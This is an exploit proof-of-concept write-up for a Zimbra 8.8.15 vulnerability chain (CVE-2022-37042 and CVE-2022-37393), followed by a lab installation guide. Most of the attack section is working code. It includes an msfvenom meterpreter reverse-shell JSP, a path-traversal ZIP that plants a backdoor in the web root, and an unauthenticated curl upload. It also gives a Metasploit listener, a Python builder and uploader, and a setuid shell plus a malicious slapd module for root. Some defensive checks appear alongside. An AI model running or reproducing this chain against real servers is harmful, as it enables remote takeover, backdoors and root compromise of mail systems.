## https://sploitus.com/exploit?id=8AD7E2C1-3DF4-597E-A28D-2C8907097174
# Zimbra 8.8.15 GA Patch 32 Exploitation

This is a proof of concept for [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042) and [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) in Zimbra Collaboration Suite. Version 8.8.15 GA Patch 32 is one of the affected releases and is the one reproduced here.

The goal is to reproduce, end to end, an important vulnerability chain Zimbra suffered in 2022: unauthenticated file write leading to remote code execution as the `zimbra` user, followed by local privilege escalation to root.

To set up the PoC environment, refer to [Zimbra installation](#zimbra-8815-ga-patch-32-installation). Once the environment is up, we can start exploiting.

## CVE-2022-37042 - Arbitrary File Upload

Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for [CVE-2022-27925](https://nvd.nist.gov/vuln/detail/CVE-2022-27925).

Originally, Zimbra described [CVE-2022-27925](https://nvd.nist.gov/vuln/detail/CVE-2022-27925) as an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the `zimbra` user. Later, attackers exploiting this vulnerability found a way to bypass the administrative requirement. This new authentication bypass received its own identifier: [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042).

By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously.

The root cause: the ```/service/extension/backup/mboximport``` endpoint on Zimbra Collaboration Suite's administrative port (7071 by default), which is designed to accept a .zip file import, does not validate the paths of the archive entries and is therefore vulnerable to a path traversal. A .zip entry whose name contains a relative path (```../```) can write anywhere on the filesystem that the ```zimbra``` user can write to. To demonstrate, we create a .zip file, then rename the file inside it to a path-traversal sequence.

> [!NOTE]
> Replace the ```LHOST``` ip with your host's ip

Create a JSP payload using msfvenom.

```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.101.8 LPORT=4444 -f jsp -o file.jsp
```

Create a zip file with the payload in it.

```bash
zip file.zip file.jsp
unzip -l file.zip
```

Now replace the name of the file inside the zip file with path traversal.

```bash
7z rn file.zip file.jsp ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp
unzip -l file.zip
```

> [!NOTE]
> Replace the IP in the requests with your Zimbra server's IP.

Upload the file to the vulnerable endpoint ```/service/extension/backup/mboximport```.

```bash
curl -X POST -k 'https://10.10.101.9:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary @file.zip
```

Set up a Metasploit listener.

```bash
msf6 > use multi/handler

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.101.8

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > run -j
```

Now trigger the payload on the server; a Meterpreter session will be spawned in the listener.

```bash
curl -k "https://10.10.101.9/public/backdoor.jsp"
```
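The steps above build the traversal archive by hand with `zip` and `7z`. The following Python script, added for this write-up (it is not the original PoC's code), does the same with the standard `zipfile` module, mirrors the `curl` upload, and also shows the validation the endpoint was missing: resolving each entry name against the extraction root and refusing anything that escapes it. The extraction root `/opt/zimbra/store/import` and the placeholder JSP body are assumptions used only so the script runs offline.

```python
"""Build the CVE-2022-37042 traversal archive and show the missing path check.

Added example for this write-up; not Zimbra's code and not the PoC's own code.
"""
import io
import os
import ssl
import sys
import urllib.request
import zipfile
from typing import List

# Same traversal target as the `7z rn` step above: lands the JSP in a
# directory served by Zimbra's Jetty without authentication.
TRAVERSAL_TARGET = (
    "../../../../../../../../../../../../"
    "opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp"
)


def build_traversal_zip(payload: bytes, entry_name: str = TRAVERSAL_TARGET) -> bytes:
    """Return a zip whose single entry carries a relative traversal path.

    zipfile.writestr does not sanitise entry names, so this is the in-Python
    equivalent of `zip file.zip file.jsp` followed by `7z rn ...`.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, payload)
    return buf.getvalue()


def entry_escapes(root: str, name: str) -> bool:
    """True if extracting `name` under `root` would land outside `root`.

    This is the check the vulnerable endpoint did not perform: normalise the
    joined path and require that it still starts with the extraction root.
    Absolute names, backslash separators and NUL bytes are rejected outright.
    """
    if name.startswith(("/", "\\")) or "\x00" in name:
        return True
    root_abs = os.path.abspath(root)
    target = os.path.abspath(os.path.join(root_abs, name.replace("\\", "/")))
    return os.path.commonpath([root_abs, target]) != root_abs


def unsafe_entries(zip_bytes: bytes, root: str = "/opt/zimbra/store/import") -> List[str]:
    """List every archive entry that would escape `root` (root is an assumed path)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist() if entry_escapes(root, i.filename)]


def upload_archive(base_url: str, zip_bytes: bytes, account: str = "admin") -> int:
    """POST the archive exactly as the curl step does and return the HTTP status.

    base_url is e.g. https://10.10.101.9:7071 ; the query string is the one
    used above. The certificate check is disabled like `curl -k` (lab only).
    """
    url = (f"{base_url}/service/extension/backup/mboximport"
           f"?account-name={account}&ow=1&no-switch=1&append=1")
    req = urllib.request.Request(url, data=zip_bytes, method="POST",
                                 headers={"Content-Type": "application/octet-stream"})
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(req, context=ctx) as resp:
        return resp.status


if __name__ == "__main__":
    # Usage: python3 build_zip.py file.jsp [https://target:7071]
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            jsp = fh.read()
    else:
        jsp = b'<% out.println("constructed placeholder"); %>'  # constructed stand-in
    archive = build_traversal_zip(jsp)
    with open("file.zip", "wb") as fh:
        fh.write(archive)
    print("entries escaping the import root:", unsafe_entries(archive))
    if len(sys.argv) > 2:
        print("upload status:", upload_archive(sys.argv[2], archive))
```

`unsafe_entries` is the one-line fix a defender would want in any ZIP-import handler: run it over the archive before extraction and reject the whole upload if it returns anything. Note that it also catches the subtler `a/../../b` form, where the first component looks harmless but the normalised path still leaves the root.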

## CVE-2022-37393 - Privilege Escalation

If the previous step succeeds we have a shell as the ```zimbra``` user, and from that account [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) can be used to escalate to root.

While this issue requires a local account on the Zimbra host, we already obtained one through [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042). The core of the issue is that the ```zimbra``` user has passwordless sudo access to a number of executables:

```bash
zimbra@zimbra:~$ sudo -l
Matching Defaults entries for zimbra on zimbra:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, !requiretty

User zimbra may run the following commands on zimbra:
    (root) NOPASSWD: /opt/zimbra/libexec/zmstat-fd *
    (root) NOPASSWD: /opt/zimbra/libexec/zmslapd
    (root) NOPASSWD: /opt/zimbra/common/sbin/postfix
    (root) NOPASSWD: /opt/zimbra/common/sbin/postalias
    (root) NOPASSWD: /opt/zimbra/common/sbin/qshape.pl
    (root) NOPASSWD: /opt/zimbra/common/sbin/postconf
    (root) NOPASSWD: /opt/zimbra/common/sbin/postsuper
    (root) NOPASSWD: /opt/zimbra/common/sbin/postcat
    (root) NOPASSWD: /opt/zimbra/libexec/zmqstat
    (root) NOPASSWD: /opt/zimbra/libexec/zmmtastatus
    (root) NOPASSWD: /opt/zimbra/common/sbin/amavis-mc
    (root) NOPASSWD: /opt/zimbra/common/sbin/nginx
    (root) NOPASSWD: /opt/zimbra/libexec/zmmailboxdmgr
```

[CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) specifically affects ```zmslapd```, which is a shell script that essentially runs **slapd** with a custom environment:

```bash
zimbra@zimbra:~$ cat /opt/zimbra/libexec/zmslapd 
#!/bin/bash
[...]

ulimit -n 32768
ulimit -c unlimited
ulimit -v unlimited
export LD_PRELOAD=/opt/zimbra/common/lib/libtcmalloc_minimal.so
exec /opt/zimbra/common/libexec/slapd "$@"
```

**slapd** is a standalone LDAP daemon, which can run as an arbitrary user and group:

```bash
zimbra@zimbra:~$ man slapd
[...]
-u user
       slapd  will  run  slapd with the specified user name or id, and that user's supplementary group access list as set with initgroups(3).  The group ID is also changed to this user's gid, unless the -g
       option is used to override.  Note when used with -r, slapd will use the user database in the change root environment.

       Note that on some systems, running as a non-privileged user will prevent passwd back-ends from accessing the encrypted passwords.  Note also that any shell back-ends will run as the  specified  non-
       privileged user.

-g group
       slapd will run with the specified group name or id.  Note when used with -r, slapd will use the group database in the change root environment.
```

And can accept a configuration file.

```bash
-f slapd-config-file
       Specifies the slapd configuration file. The default is /opt/zimbra/common/etc/openldap/slapd.conf.
```

That configuration file can load dynamic modules (shared objects) from an arbitrary path; the stock file shows the directives, commented out:

```bash
zimbra@zimbra:~$ cat /opt/zimbra/common/etc/openldap/slapd.conf
[...]
# Load dynamic backend modules:
# modulepath	/opt/zimbra/common/libexec/openldap
# moduleload	back_mdb.la
# moduleload	back_ldap.la
```

We can use a very simple C program that spawns a shell (rootslap.c). Once the file is setuid root, the `setuid(0)` call makes the real uid 0 as well, so the shell does not drop privileges.

```c
#include <stdio.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execv needs a NULL-terminated argv; the original used execvp with NULL */
    char *const argv[] = {"/bin/sh", NULL};
    execv("/bin/sh", argv);
    perror("execv");
    return 1;
}
```

And a shared module whose constructor runs inside slapd (as root, since we will start it with ```-u root -g root```) and turns that binary into a setuid-root executable (libhax.c):

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* Runs automatically when slapd dlopen()s the module via `moduleload`. */
__attribute__ ((__constructor__))
void dropshell(void) {
    chown("/tmp/slapper/rootslap", 0, 0);   /* root:root */
    chmod("/tmp/slapper/rootslap", 04755);  /* setuid bit */
    printf("[+] done!\n");
}
```

And a configuration file for slapd (slapd.conf).

```bash
modulepath	/tmp/slapper
moduleload	libhax.so
```

This can be automated with the published proof of concept, but to run it by hand (note that some of the compilation commands are simplified here; ```/tmp/slapper``` must exist before compiling):

```bash
zimbra@zimbra:/tmp$ gcc -shared -o /tmp/slapper/libhax.so ./libhax.c                 
[...]
zimbra@zimbra:/tmp$ gcc -o /tmp/slapper/rootslap ./rootslap.c                        
[...]
zimbra@zimbra:/tmp$ sudo /opt/zimbra/libexec/zmslapd -u root -g root -f ./slapd.conf 
[+] done!
zimbra@zimbra:/tmp$ ls -l slapper/rootslap                                           
-rwsr-xr-x 1 root root 8480 Jul 21 22:18 slapper/rootslap
zimbra@zimbra:/tmp$ slapper/rootslap                                                 
# whoami
root
```
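The sudo listing above is the kind of thing to audit on any Zimbra host, and the pattern that makes ```zmslapd``` dangerous is generic: a NOPASSWD wrapper that does ```exec <binary> "$@"``` hands every argument of the underlying program, including ```-u```, ```-g``` and ```-f```, to root. The following audit script is an added example for this write-up (not Zimbra's tooling and not the PoC's code). It parses ```sudo -l``` output, flags wildcard argument rules, and flags wrappers that pass their arguments straight through. The sample input is a constructed copy of the listing and of the ```zmslapd``` script shown above; on a real host you would read the wrapper contents from disk.

```python
"""Audit `sudo -l` output for NOPASSWD wrappers that hand root to their arguments.

Added example for this write-up; not Zimbra's tooling and not the PoC's own code.
"""
import re
from typing import Dict, List, Optional

# Constructed sample: the `sudo -l` listing from the write-up, trimmed.
SUDO_L_OUTPUT = """\
User zimbra may run the following commands on zimbra:
    (root) NOPASSWD: /opt/zimbra/libexec/zmstat-fd *
    (root) NOPASSWD: /opt/zimbra/libexec/zmslapd
    (root) NOPASSWD: /opt/zimbra/common/sbin/postfix
    (root) NOPASSWD: /opt/zimbra/common/sbin/nginx
"""

# Constructed stand-in for reading the wrapper scripts from disk. Only the
# zmslapd body is known from the write-up; the other commands are left out
# and are reported as "not inspected".
WRAPPER_CONTENTS: Dict[str, str] = {
    "/opt/zimbra/libexec/zmslapd": (
        "#!/bin/bash\n"
        "ulimit -n 32768\n"
        "export LD_PRELOAD=/opt/zimbra/common/lib/libtcmalloc_minimal.so\n"
        'exec /opt/zimbra/common/libexec/slapd "$@"\n'
    ),
}

RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$')
PASSTHRU_RE = re.compile(r'^\s*exec\s+(?P<target>\S+)(?:\s+\S+)*\s+"\$@"\s*$', re.MULTILINE)


def parse_sudo_l(text: str) -> List[dict]:
    """Turn the rule lines of `sudo -l` into dicts (runas, nopasswd, cmd, args)."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m or not m.group("cmd").startswith("/"):
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules


def passthrough_target(script: str) -> Optional[str]:
    """Return the binary a wrapper execs with "$@" unchanged, or None."""
    m = PASSTHRU_RE.search(script)
    return m.group("target") if m else None


def audit(sudo_text: str, wrappers: Dict[str, str]) -> List[str]:
    """Return one finding per risky NOPASSWD root rule."""
    findings = []
    for r in parse_sudo_l(sudo_text):
        if r["runas"] != "root" or not r["nopasswd"]:
            continue
        if r["args"] == "*":
            findings.append(f'{r["cmd"]}: unrestricted arguments ("*") as root')
        script = wrappers.get(r["cmd"])
        if script is None:
            findings.append(f'{r["cmd"]}: not inspected (binary or contents unavailable)')
            continue
        target = passthrough_target(script)
        if target:
            findings.append(f'{r["cmd"]}: wrapper passes all arguments to {target} as root')
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L_OUTPUT, WRAPPER_CONTENTS):
        print("[!]", f)
```

The ```zmslapd``` finding is exactly the CVE-2022-37393 condition: slapd accepts ```-u```/```-g``` to pick its identity and ```-f``` to pick a config that can ```moduleload``` an attacker-owned shared object, so passing ```"$@"``` through a root NOPASSWD rule is equivalent to an unrestricted root shell.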

## Zimbra 8.8.15 GA Patch 32 Installation

This is a guide to building a vulnerable Zimbra instance affected by [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042) and [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393).

> [!NOTE]
> Clone the repository before continuing.

### Future Deprecation Solution

> [!NOTE]
> Continue to [normal installation](#normal-installation) unless you already tried it and the installation failed because of **missing packages**.

If one or more required packages have been removed from the official Zimbra 8 repository, you can use this [Google Drive location](https://drive.google.com/file/d/1HkM6MKY9Gfv94TY2hVmWfXnR8GejD1Fh/view?usp=sharing) to download a ```tar.gz``` file containing all the packages needed for a successful installation of Zimbra 8.8.15 Patch 32.

After downloading the file, move it into the cloned repository and extract its contents as follows; you will end up with a directory named ```zimbra-8.8.15.p32-packages```.

```bash
tar -xzf zimbra-8p32-packages.tar.gz zimbra-8.8.15.p32-packages
```

> [!WARNING]
> The name of the directory containing the packages **MUST** be ```zimbra-8.8.15.p32-packages```.

Now you can proceed with the normal installation process.

### Normal Installation

> [!IMPORTANT]
> You have to add a zimbra license ```.xml``` file to the repository, you can get a trial license on the [zimbra website](https://www.zimbra.com/connect/forms/?form=trial-license).

Being inside the cloned repository, run the installation script with root privileges.

```bash
sudo ./install-zimbra.sh
```

Wait until the ```Starting zimbra installation...``` message appears. You will then be asked for input such as ```Y``` for **Yes** or ```N``` for **No**; answer exactly as follows.

- For the first two prompts enter ```Y```, as they concern policies and agreements.

- You will then be asked ```Use Zimbra's package repository [Y]```; you MUST answer ```N``` for this to work.

> [!WARNING]
> If you enter ```Y```, the official Zimbra 8 repository will be configured and will take precedence over the local Patch 32 repository, causing the installation to fail.

- Next you will be prompted for each package. Answer according to the following table for the installation to complete successfully.

| Package                   | Input |
|---------------------------|-------|
|        zimbra-ldap        |   Y   |
|       zimbra-logger       |   Y   |
|         zimbra-mta        |   Y   |
|      zimbra-dnscache      |   N   |
|        zimbra-snmp        |   Y   |
|        zimbra-store       |   Y   |
|       zimbra-apache       |   Y   |
|        zimbra-spell       |   Y   |
|      zimbra-convertd      |   Y   |
|      zimbra-memcached     |   Y   |
|        zimbra-proxy       |   Y   |
|      zimbra-archiving     |   N   |
|        zimbra-drive       |   N   |
|        zimbra-imapd       |   N   |
| zimbra-network-modules-ng |   N   |
|        zimbra-chat        |   N   |

- When ```The system will be modified.  Continue? [N]``` is prompted, enter ```Yes``` for the installation to continue.

- At ```Change domain name? [Yes]```, press the ```return``` key, or enter ```Yes``` and then press the ```return``` key.

- At ```Create domain: [mail.example.com]```, enter the domain part of the machine's hostname; e.g. for hostname ```mail.company.net```, enter ```company.net```.

- A menu will be displayed. Enter ```6``` to select the zimbra-store section, then ```4``` to set the admin console password, type a password, and enter ```r``` followed by the ```return``` key to go back to the previous menu.

- Now you have to open another terminal instance and edit ```/opt/zimbra/bin/zmcertmgr```, you will need root privileges to be able to edit the file.

```bash
sudo vim /opt/zimbra/bin/zmcertmgr
```

- Edit line 1821 and add "-nomac".

```perl
1817    @out = $self->run(
1818        $self->Openssl, "pkcs12", "-inkey", $keyf,
1819        "-in",          $crtf,    "-name",  $server,
1820        "-export",      "-out",   $pkcsf,   "-passout",
1821        "pass:$kpass",  "-nomac", "2>&1"
1822    );
```

- Do the same for line 1882.

```perl
1878    @out = $self->run(
1879        $self->Openssl, "pkcs12", "-inkey", $keyf,
1880        "-in",          $crtf,    "-name",  $server,
1881        "-export",      "-out",   $pkcsf,   "-passout",
1882        "pass:$kpass",  "-nomac", "2>&1"
1883    );
```

- Save the changes and return to the installation process, where the prompt ```Select from menu, or press 'a' to apply config (? - help) ``` is displayed; enter ```a``` to apply the configuration.

- When ```Save configuration data to a file? [Yes]``` prompt is displayed, press the ```return``` key or enter ```Yes``` and press the ```return``` key.

- When ```Save config in file: [/opt/zimbra/config.83161]``` prompt is displayed, press the ```return``` key.

- When ```The system will be modified - continue? [No]``` prompt is displayed, enter ```Yes``` before pressing the ```return``` key.

- Wait until installation finishes and press the ```return``` key.